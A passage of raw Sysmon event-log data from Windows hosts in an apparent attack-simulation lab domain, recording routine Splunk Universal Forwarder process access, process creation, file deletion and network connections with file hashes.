Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081204Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.787{2FDD8D40-B20F-615A-3F01-00000000FD01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081203Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.771{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06C5E007CC25D7E8CDBE8D19F507AB2C,SHA256=160F1EF5530081FC6CD1C87420600FE19CDFF3F646F75B0E52A8E43B3421D694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081202Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A80801472BBF93AF03A1E85EE1298CCE,SHA256=C2766AFAEC2A2945B39F5633066B3C2828B9060E3B533944F9BF9DE560C8A0A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103302Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:36.194{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B06A2F9E0ECBD651E51C95B143F97FC,SHA256=36A1D177537BDCCA9F83C24066F74E90500B03F301D1C09C588641D2C1CE3715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081233Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.880{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61F5D2FC5066EC6ED6C978A247DCD3DD,SHA256=F97BC55D2F1284351BA70DAF20CCAC92F095BD7F3130205E4885EB1D67DEDF6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081232Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.755{2FDD8D40-B210-615A-4001-00000000FD01}6361160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081231Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B210-615A-4001-00000000FD01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081230Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081229Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081228Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081227Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081226Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081225Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081224Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081223Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081222Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081221Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B210-615A-4001-00000000FD01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081220Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.583{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B210-615A-4001-00000000FD01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081219Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.584{2FDD8D40-B210-615A-4001-00000000FD01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081218Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C22310C323E32294803E4B5D1F22ABC1,SHA256=EC303E1FB98ACB7C30A8DFD7695D0DAE26E1AAA532E925A290D60CE6BC85066D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103303Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:37.241{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98FE5181CA0362E5627DE0D1A9083647,SHA256=C188697E7CF6F0EE7F246300E423B6F81A89ECE4C8C2A3761CBFAFD367C4178C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081234Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:37.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A64084E28DB9F59D716656F80D5B2466,SHA256=D3820010D4162773D63E70CF033A0FFF34A0588C4D59D896B09FFDE15F1BCADB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103304Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:38.272{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEBBD5C4C14DB9270F42948F5867BA2,SHA256=F5356CB315EE4C1B3C491E5413CB53CABBCEC1403CF8CE537F07016660D25B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081235Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:38.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300F681B585DDB6A0B37181CA47D0B4D,SHA256=EED5AC2B4D0A37C83B8A515FAE24E3CA3E6DA0F3EA74BB64E6AAFBB401E17103,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103306Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:38.445{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49511-false10.0.1.12-8000- 23542300x8000000000000000103305Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:39.288{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E99E2596A93876AFF72508B9005DF2F7,SHA256=60EFD2B4241CA530F88EA1C08A8A6E30FBE419734DEE1785948112D98090401E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081237Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:36.604{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50012-false10.0.1.12-8000- 23542300x800000000000000081236Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:39.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2531FE9A302E1539BD9174B391E6BE57,SHA256=6F331B0782FBE5D4CAEB485FDF4758C995141AC317DE33BF49CB526508C60603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103307Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:40.288{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AC2983FA5868F0C3502C10E9145157,SHA256=78DE57FED4191CAD4DE676DB57EF2C4C3F566DBC2D667887D3A10139F8AA9BA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081238Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:40.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D04350E5974AB425A3C56B3643634E,SHA256=2E099F488314C18E869A24A5801882654F0CEA73810973C9B5959A3743E53174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103308Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:41.303{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21BC0E80599228B4AF9D78BB7C58C703,SHA256=5EF00B0DAB72501848A16AE94B8567805E5232A9CC81420DE6D187FA5AE651CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081239Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:41.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0265689C0233FB5A32660CCDF1DADF,SHA256=9445E8942A9C21208217943DBCB160AE86A19EB787458CB70ECEA05FB8723B66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103309Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:42.303{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9EFB0DC8A3EC96A12BD0BF8B4A3B5E8,SHA256=396C526FA068F57D5489CAEA48031372E42C0E4F34EF3E42C77D34B8738361F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081240Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:42.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19BD07F4C9470E8272505C98AFB5EFF9,SHA256=669006CD7C9E54DC7372CDAA1F7E957C01A1F12D685C7A400F9D0502775B434B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103310Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:43.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B569293EC3A452BB83DD570C6453AF13,SHA256=E668571DC87CE48FAEFB110EB21B9CD6EE479E0889B7E4820614F79E4BB082CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081242Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:41.776{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50013-false10.0.1.12-8000- 23542300x800000000000000081241Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:43.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 